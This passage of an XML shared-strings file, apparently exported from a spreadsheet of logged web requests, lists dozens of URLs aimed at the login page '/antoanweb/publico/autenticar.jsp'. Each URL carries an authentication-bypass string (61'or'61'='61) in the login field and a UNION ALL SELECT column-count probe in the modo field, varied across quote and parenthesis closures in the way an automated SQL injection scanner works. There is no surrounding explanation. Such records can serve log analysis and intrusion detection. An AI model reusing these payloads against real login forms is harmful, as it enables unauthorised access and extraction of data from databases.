    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113--and(9301=9301</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874--and(593=593</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948,8948--and(5710=5710</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662,3662--and(5399=5399</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583,3583--and((4433=4433</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498,1498--and((2434=2434</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747,5747--and((9225=9225</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593,2593--and((6658=6658</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578,9578--and((9743=9743</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040,9040--and((7817=7817</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845,3845--and((8657=8657</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571--and((2437=2437</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286,9286--and((998=998</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355,1355--and((6610=6610</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963--and(((8714=8714</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498,2498--and(((5041=5041</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614--and(((6671=6671</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819,6819--and(((5240=5240</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703,9703--and(((7628=7628</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959--and(((5704=5704</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089,8089--and(((7346=7346</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302,302--and(((9304=9304</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279,3279--and(((2059=2059</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086--and(((5595=5595</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397,4397--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567,9567--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816,816--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987,6987--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979,9979--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133,3133--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763,2763--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909,3909--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650,8650--and('cbmc'='cbmc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482,482--and('aenl'='aenl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120,6120--and('rvcw'='rvcw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154,4154--and('eqkd'='eqkd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069--and('jhkn'='jhkn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509--and('ykti'='ykti</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635,7635--and('ulkk'='ulkk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389,4389--and('ylgh'='ylgh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177,6177--and('bqce'='bqce</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107--and('ytgk'='ytgk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824,2824--and(('kfac'='kfac</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004--and(('rtjh'='rtjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844,1844--and(('iaqc'='iaqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521--and(('ogbb'='ogbb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351--and(('lqvm'='lqvm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342,9342--and(('yeno'='yeno</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653,8653--and(('mfim'='mfim</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062,7062--and(('avev'='avev</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727--and(('tiys'='tiys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904,8904--and(('syhe'='syhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926--and((('cxre'='cxre</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731,4731--and((('orze'='orze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597--and((('ducm'='ducm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242,2242--and((('jvzb'='jvzb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648,7648--and((('gsfs'='gsfs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829,829--and((('boqz'='boqz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463--and((('ezql'='ezql</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466--and((('wiwf'='wiwf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829,5829--and((('xlou'='xlou</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296,3296--and((('wlkb'='wlkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510,2510--and'kmff'='kmff</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409--and'vkyb'='vkyb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657,5657--and'fidq'='fidq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835--and'rmzu'='rmzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300,4300--and'fscv'='fscv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715--and'obju'='obju</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449,449--and'wuqf'='wuqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517,1517--and'uhji'='uhji</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668,3668--and'cnhe'='cnhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314,6314--and'voqa'='voqa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956,3956--and('xpml'like'xpml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202--and('yzyf'like'yzyf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271,8271--and('cnze'like'cnze</t>
  </si>
  <si>
